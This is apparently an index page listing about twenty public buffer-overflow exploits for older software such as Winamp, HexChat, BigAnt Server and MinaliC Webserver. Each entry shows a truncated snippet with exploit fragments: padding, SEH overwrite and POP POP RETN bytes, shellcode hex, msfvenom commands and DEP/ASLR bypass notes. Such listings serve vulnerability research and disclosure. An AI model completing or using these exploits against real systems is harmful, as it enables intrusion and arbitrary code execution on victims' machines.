HexChat-2.9.4-Local-Exploit

HexChat 2.9.4 Local Exploit Bug found by Jules Carter @iMulitia Exploit by Matt "hostess" Andreko mandreko at accuvant.com http://www.mattandreko.com/2013/04/buffer-overflow-in-hexchat-294.html junk1 = "B"30 shellcode = msfvenom -p windows/messagebox EXITFUNC=process BufferRegister=ESP -e...

VirtualDJ-ProHome-7.3

Exploit Author: Alexandro Sánchez Bach functionmixer.blogspot.com Vendor Homepage: http://www.virtualdj.com/ Software Link: http://www.filehippo.com/en/downloadvirtualdj/14361/ Version: VirtualDJ Pro/Home 7.3 def encodeDatadecoder, data, validValues: assert data.find"\0" == -1, "Shellcode must be...

aSc-Timetables-2013

The buffer overflow vulnerability resides in the Add subject functionality, and it's triggered when the user will submit a large string when specifying the school subject name. To trigger the vulnerability go to the main menu , select subjects , click new then generate a string with the code belo...

Adrenalin-Player-2.2.5.3-(.asx)-

Title: Adrenalin Player .asx - SEH Buffer Overflow software: Adrenalin Player version : 2.2.5.3 Platform: Windows XP sp3 Date: June 18th, 2013 header=" " junk= "\x90" 2079 junk+="\xeb\x06\x90\x90" jmp short junk+="\x13\xf3\x16\x10" POP POP RETN AdrenalinX.dll junk+="\x90" 16 NOP padding before...

Winamp-5.1x-(.m3u)

Stack-based buffer overflow in Nullsoft Winamp 5.12 and 5.13 allows user-assisted attackers to cause a denial of service crash and possibly execute arbitrary code via a crafted .m3u file that causes an incorrect strncpy function call when the player pauses or stops the file. import struct header ...

BOINC-Manager-7.0.64

BOINC is a program that lets you donate your idle computer time to science projects like SETI@home, Climateprediction.net, Rosetta@home, World Community Grid, and many others. In order to exploit the vulnerability the attacker must convince the victim to use the very long URL as Account Manager...

Ophcrack-3.5.0---Local-Code

Exploit Author: xisone@STM Solutions Vendor Homepage: http://ophcrack.sourceforge.net/ Software Link: http://downloads.sourceforge.net/ophcrack/ophcrack-win32-installer-3.5.0.exe Version: 3.5.0 shellcode = windows/exec EXITFUNC=seh CMD=calc R | msfencode -e x86/alphamixed bufferregister=esp -t c...

No-IP-Dynamic-Update-Client-

This exploit covers a stack-based overflow present in -i parameter, IPaddress variable name in source code. It is probably the most basic parameter, as this is the way to say the client that our IP has changed import os binary = "./noip-2.1.9-1/binaries/noip2-i686" shellcode =...

Easy-LAN-Folder-Share-3.2.0-SEH

The registration code field in the 'activate license' window is vulnerable to a buffer overflow. This script generates a malicious registry file. Once the generated file has been loaded into the registry, execute the application as normal. header = "Windows Registry Editor Version 5.00\n\n" heade...

BlazeDVD-Pro-player-6.1-Stack-Based-Buffer

BlazeDVD Pro player 6.1 Local stack based buffer overflow Author: PuN1sh3r Email: [email protected] Date: Mon Jul 15 03:01:37 EDT 2013 Vendor link: http://www.blazevideo.com/download.htmm Software Link: http://www.blazevideo.com/download.php?product=BlazeDVDPro App Version: 6.1 $file =...

Adrenalin-Player-2.2.5.3-.wvx-SEH

Exploit Title:Adrenalin Player 2.2.5.3 .wvx SEH-Buffer Overflow Date:7/1/2013 Exploit Author:MrXors Vendor HomePage:http://software.naver.com/software/summary.nhn?softwareId=MFS100099 Software Link:http://software.naver.com/software/summary.nhn?softwareId=MFS100099 Version App:2.2.5.3...

VUPlayer-2.49-(.M3U)-DEP-Bypass

VUPlayer 2.49 .M3U ExploitUniversal buffer overflow/DEP bypass Download: http://vuplayer.com/ Tested on Wind0ws XP SP3 DEP:OptOut import struct p = open"ExploitVirtualProtect.m3u", "w" crash = "\x41" 1012 sc = "\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49"...

VCDGear-3.50---(.cue)

Description: VCDGEAR 3.50 is prone to a stack-based buffer overflow vulnerability because the application fails to perform adequate boundary-checks on user-supplied input. An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will...

MP3Info-0.8.5a---SEH

The process memory region starts with a null byte but exploitation is still possible because of the little endian architecture provided that the return address gets placed at the end of the buffer, this however confines us in the tiny 4-byte area after pop/pop/retn Using a couple of trampolines I...

MailMax-4.6-POP3-

MailMax v4.6 POP3 "USER" Remote Buffer Overflow Exploit No Login Needed Newer version's not tested, maybe vulnerable too A hard one this, the shellcode MUST be lowercase. Plus there are many opcode's that break the payload and opcodes that gets changed, like "\xc3" gets converted to "\xe3", and...

Freefloat-FTP-Server-PUT

In my disclosure to FreeFloat, I reported my discovery and notified them that other exploits for various FTP commands supported by the FreeFloat FTP existed on the internet just to be assured they knew as SecPod reported their findings last year. They responded and acknowledged my discovered...

BigAnt-Server-2.52-SP5-SEH

Exploit Title: BigAnt Server 2.52 SP5 SEH Stack Overflow ROP-based exploit ASLR + DEP bypass Date: 03/11/2012 Exploit Author: Lorenzo Cantoni Vendor Homepage: http://www.bigantsoft.com/ Version: BigAnt Console 2.52 SP5 Tested on: Windows 7 SP0 x86 Italian - expsrv.dll 6.0.9589 Info: Vulnerability...

MinaliC-Webserver-2.0.0

Exploit Title: MinaliC Webserver buffer overflow Date: 12 Apr 2013 Exploit Author: superkojiman - http://www.techorganic.com Vendor Homepage: http://minalic.sourceforge.net/ Version: MinaliC Webserver 2.0.0 import socket import struct 74 bytes calc.exe from...

Bifrost-1.2.1-Remote-Buffer-OverFlow

Bifrost contains an overflow condition that is triggered as user-supplied input is not properly validated when handling specially crafted commands. This may allow a remote attacker to cause a buffer overflow, allowing the execution of arbitrary code. import socket from time import sleep from...

haneWIN-DNS-Server-1.5.3

Description: A SEH overflow occurs when large amount of data is sent to the server Author: Dario Estrada dash https://intrusionlabs.org Date: 2014-01-29 Version: haneWIN DNS Server 1.5.3 Vendor Homepage: http://www.hanewin.net/ Vulnerable app link:http://www.hanewin.net/dns-e.htm import socket,...